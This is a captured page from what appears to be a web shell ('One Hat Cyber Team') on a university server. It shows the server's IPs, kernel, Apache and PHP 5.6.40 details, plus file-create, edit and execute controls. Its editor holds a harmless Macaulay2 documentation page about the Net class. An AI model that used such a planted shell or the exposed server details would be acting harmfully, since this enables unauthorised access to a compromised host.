One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
Macaulay2
/
Macaulay2Doc
/
html
/
Edit File:
___Net.html
<!DOCTYPE html> <html lang="en"> <head> <title>Net -- the class of all nets and strings</title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <link type="text/css" rel="stylesheet" href="../../../../Macaulay2/Style/doc.css"> <link rel="stylesheet" href="../../../../Macaulay2/Style/katex/katex.min.css"> <script defer="defer" src="../../../../Macaulay2/Style/katex/katex.min.js"></script> <script defer="defer" src="../../../../Macaulay2/Style/katex/contrib/auto-render.min.js"></script> <script> var macros = { "\\break": "\\\\", "\\ZZ": "\\mathbb{Z}", "\\NN": "\\mathbb{N}", "\\QQ": "\\mathbb{Q}", "\\RR": "\\mathbb{R}", "\\CC": "\\mathbb{C}", "\\PP": "\\mathbb{P}" }, delimiters = [ { left: "$$", right: "$$", display: true}, { left: "\\[", right: "\\]", display: true}, { left: "$", right: "$", display: false}, { left: "\\(", right: "\\)", display: false} ], ignoredTags = [ "kbd", "var", "samp", "script", "noscript", "style", "textarea", "pre", "code", "option" ]; document.addEventListener("DOMContentLoaded", function() { renderMathInElement(document.body, { delimiters: delimiters, macros: macros, ignoredTags: ignoredTags, trust: true }); }); </script> <style>.katex { font-size: 1em; }</style> <script defer="defer" src="../../../../Macaulay2/Style/katex/contrib/copy-tex.min.js"></script> <script defer="defer" src="../../../../Macaulay2/Style/katex/contrib/render-a11y-string.min.js"></script> <script src="../../../../Macaulay2/Style/prism.js"></script> <script>var current_version = '1.25.06';</script> <script src="../../../../Macaulay2/Style/version-select.js"></script> <link type="image/x-icon" rel="icon" href="../../../../Macaulay2/Style/icon.gif"> </head> <body> <div id="buttons"> <div> <a href="https://macaulay2.com/">Macaulay2</a> <span id="version-select-container"></span> » <a title="Macaulay2 documentation" href="index.html">Documentation </a> <br><a href="_packages_spprovided_spwith_sp__Macaulay2.html">Packages</a> » <span><a title="Macaulay2 documentation" href="index.html">Macaulay2Doc</a> » <a href="___The_sp__Macaulay2_splanguage.html">The Macaulay2 language</a> » <a title="an overview of strings and nets in Macaulay2" href="_strings_spand_spnets.html">strings and nets</a> » <a title="the class of all nets and strings" href="___Net.html">Net</a></span> </div> <div class="right"> <form method="get" action="https://www.google.com/search"> <input placeholder="Search" type="text" name="q" value=""> <input type="hidden" name="q" value="site:macaulay2.com/doc"> </form> <a href="_newline.html">next</a> | <a href="___String.html">previous</a> | <a href="_width.html">forward</a> | <a href="__dq.html">backward</a> | <a href="_strings_spand_spnets.html">up</a> | <a href="master.html">index</a> | <a href="toc.html">toc</a> </div> </div> <hr> <div> <h1>Net -- the class of all nets and strings</h1> <div> <h2>Description</h2> A net is a generalization of a string that is designed to facilitate two-dimensional printing on ascii terminals. It consists of a rectangular array of characters subdivided horizontally by an imaginary baseline. <p></p> Operations on nets also accept strings by interpreting a string as a rectangle of height one with the baseline just below it. In fact, the parent of <a title="the class of all strings" href="___String.html">String</a> is <a title="the class of all nets and strings" href="___Net.html">Net</a>. <p></p> Multiple nets per line can be sent to an output file with <a title="a binary operator, used for bit shifting or file output" href="__lt_lt.html"><<</a> but care must be taken to use <a title="end an output line" href="_endl.html">endl</a> to end lines, for nets with new line characters embedded in them will be displayed in an unexpected way. <p></p> Warning: if so many characters are written to a file that an internal buffer is filled before the line ends or first net is seen, then the buffer will be flushed, and writing a net subsequently will produce an unexpected result. </div> <div> <h3>Menu</h3> <ul> <li><span><a title="width of an object" href="_width.html">width</a> -- width of an object</span></li> <li><span><a title="width of a net" href="_width_lp__Net_rp.html">width(Net)</a> -- width of a net</span></li> <li><span><a title="height of a net" href="_height_lp__Net_rp.html">height(Net)</a> -- height of a net</span></li> <li><span><a title="depth of a net" href="_depth_lp__Net_rp.html">depth(Net)</a> -- depth of a net</span></li> <li><span><kbd>length(Net)</kbd> -- see <span><a title="length of a string" href="_length_lp__String_rp.html">length(String)</a> -- length of a string</span></span></li> <li><span><a title="raise a net or string" href="___Net_sp%5E_sp__Z__Z.html">Net ^ ZZ</a> -- raise a net or string</span></li> <li><span><a title="join nets or strings vertically" href="___Net_sp_vb_vb_sp__Net.html">Net || Net</a> -- join nets or strings vertically</span></li> <li><span><a title="join strings or nets" href="___Net_sp_vb_sp__Net.html">Net | Net</a> -- join strings or nets</span></li> </ul> </div> <div> <div class="waystouse"> <h2>Types of net:</h2> <ul> <li><span><a title="the class of all strings" href="___String.html">String</a> -- the class of all strings</span></li> </ul> <h2>Functions and methods returning a net:</h2> <ul> <li><span><a title="generate assert statements from experimental input" href="_generate__Assertions.html">generateAssertions</a> -- generate assert statements from experimental input</span></li> <li><span><kbd>horizontalJoin(BasicList)</kbd> -- see <span><a title="join nets or strings horizontally" href="_horizontal__Join.html">horizontalJoin</a> -- join nets or strings horizontally</span></span></li> <li><span><a title="format for printing, as a net" href="_net.html">net</a> -- format for printing, as a net</span></li> <li><span><a title="raise a net or string" href="___Net_sp%5E_sp__Z__Z.html">Net ^ ZZ</a> -- raise a net or string</span></li> <li><span><kbd>String ^ ZZ</kbd> -- see <span><a title="raise a net or string" href="___Net_sp%5E_sp__Z__Z.html">Net ^ ZZ</a> -- raise a net or string</span></span></li> <li><span><a title="join strings or nets" href="___Net_sp_vb_sp__Net.html">Net | Net</a> -- join strings or nets</span></li> <li><span><a title="join nets or strings vertically" href="___Net_sp_vb_vb_sp__Net.html">Net || Net</a> -- join nets or strings vertically</span></li> <li><span><a title="examine contents of an object" href="_peek.html">peek</a> -- examine contents of an object</span></li> <li><span><a title="examine contents of an object" href="_peek_sq.html">peek'</a> -- examine contents of an object</span></li> <li><span><kbd>stack(BasicList)</kbd> -- see <span><a title="join nets or string vertically" href="_stack.html">stack</a> -- join nets or string vertically</span></span></li> <li><span><a title="vertically stacked copies of a string" href="___String_sp%5E_sp__Sequence.html">String ^ Sequence</a> -- vertically stacked copies of a string</span></li> </ul> <h2>Methods that use a net:</h2> <ul> <li><span><kbd># Net</kbd> -- see <span><a title="length or cardinality of a list, hash table, dictionary, set, or string" href="__sh_sp__List.html"># List</a> -- length or cardinality of a list, hash table, dictionary, set, or string</span></span></li> <li><span><kbd>Net #? ZZ</kbd> -- see <span><a title="check existence of value in a list, hash table, database, or string" href="__sh_qu.html">#?</a> -- check existence of value in a list, hash table, database, or string</span></span></li> <li><span><kbd>capture(Net)</kbd> -- see <span><a title="evaluate Macaulay2 code and capture the output" href="_capture.html">capture</a> -- evaluate Macaulay2 code and capture the output</span></span></li> <li><span><a title="depth of a net" href="_depth_lp__Net_rp.html">depth(Net)</a> -- depth of a net</span></li> <li><span><a title="height of a net" href="_height_lp__Net_rp.html">height(Net)</a> -- height of a net</span></li> <li><span><kbd>length(Net)</kbd> -- see <span><a title="length of a string" href="_length_lp__String_rp.html">length(String)</a> -- length of a string</span></span></li> <li><span><kbd>Net # ZZ</kbd> -- see <span><a title="get value from list, hash table, database, dictionary, or string" href="___List_sp_sh_sp__Z__Z.html">List # ZZ</a> -- get value from list, hash table, database, dictionary, or string</span></span></li> <li><span><kbd>NetFile << Net</kbd> -- see <span><a title="the class of all net files" href="___Net__File.html">NetFile</a> -- the class of all net files</span></span></li> <li><span><kbd>pad(Net,ZZ)</kbd> -- see <span><a title="pad a string or net with spaces" href="_pad.html">pad</a> -- pad a string or net with spaces</span></span></li> <li><span><kbd>pad(ZZ,Net)</kbd> -- see <span><a title="pad a string or net with spaces" href="_pad.html">pad</a> -- pad a string or net with spaces</span></span></li> <li><span><kbd>File << Net</kbd> -- see <span><a title="print to a file" href="_printing_spto_spa_spfile.html">printing to a file</a> -- print to a file</span></span></li> <li><span><kbd>unstack(Net)</kbd> -- see <span><a title="list the rows of a net" href="_unstack.html">unstack</a> -- list the rows of a net</span></span></li> <li><span><a title="width of a net" href="_width_lp__Net_rp.html">width(Net)</a> -- width of a net</span></li> </ul> </div> <div class="waystouse"> <h2>For the programmer</h2> <p>The object <a title="the class of all nets and strings" href="___Net.html">Net</a> is <span>a <a title="the class of all mutable types" href="___Type.html">type</a></span>, with ancestor class <a title="the class of all things" href="___Thing.html">Thing</a>.</p> </div> <hr> <div class="waystouse"> <p>The source of this document is in <span class="tt">Macaulay2Doc/ov_strings.m2:187:0</span>.</p> </div> </div> </div> </body> </html>
Simpan